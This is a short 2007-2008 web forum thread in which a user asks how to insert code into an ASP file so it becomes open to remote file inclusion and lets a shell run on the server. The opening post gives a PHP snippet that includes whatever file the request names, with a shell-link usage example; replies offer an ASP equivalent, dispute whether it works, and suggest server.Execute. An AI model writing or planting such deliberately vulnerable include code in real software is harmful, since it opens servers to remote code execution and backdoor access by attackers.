[URGENT] How to make an ASP file vulnerable ?

Discussion in 'C#' started by shankar91, Dec 31, 2007.

0
  1. #1
    Hey all,

    As teh topic name says, i wanna add a Vulnerable Code to asn ASP file so that the asp file becomes Vulnerable to RFI.

    For example , in php if u add this code :

    <?php
$file=$_GET('file');
include($file);
?>
    Code (markup):
    this file becomes vulnerable to RFI ie

    filename.php?file=php-shell-link



    So, I want an ASP code that makes the asp file vulnerable so that a shell can be executed on the server.


    If anyone knows please answer.

    regards!
     
    shankar91, Dec 31, 2007 IP
  2. moom

    moom Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2 
    
<%
dim incfile
incfile=request("file")
%>

<!--#include file=incfile -->
    Code (markup):
     
    moom, Jan 2, 2008 IP
  3. teraeon

    teraeon Peon

    Messages:
    40
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #3
    That actually doesn't work, there is a way to do it, however what do you need to do this for?
     
    teraeon, Jan 7, 2008 IP
  4. N_F_S

    N_F_S Active Member

    Messages:
    2,475
    Likes Received:
    56
    Best Answers:
    0
    Trophy Points:
    90
    #4
    unfortunately, you cannot use variables inside "include" statement in asp.
     
    N_F_S, Jan 11, 2008 IP
  5. Link.ezer.com

    Link.ezer.com Peon

    Messages:
    647
    Likes Received:
    28
    Best Answers:
    0
    Trophy Points:
    0
    #5
    you may try

    server.Execute("fileanme")
     
    Link.ezer.com, Jan 11, 2008 IP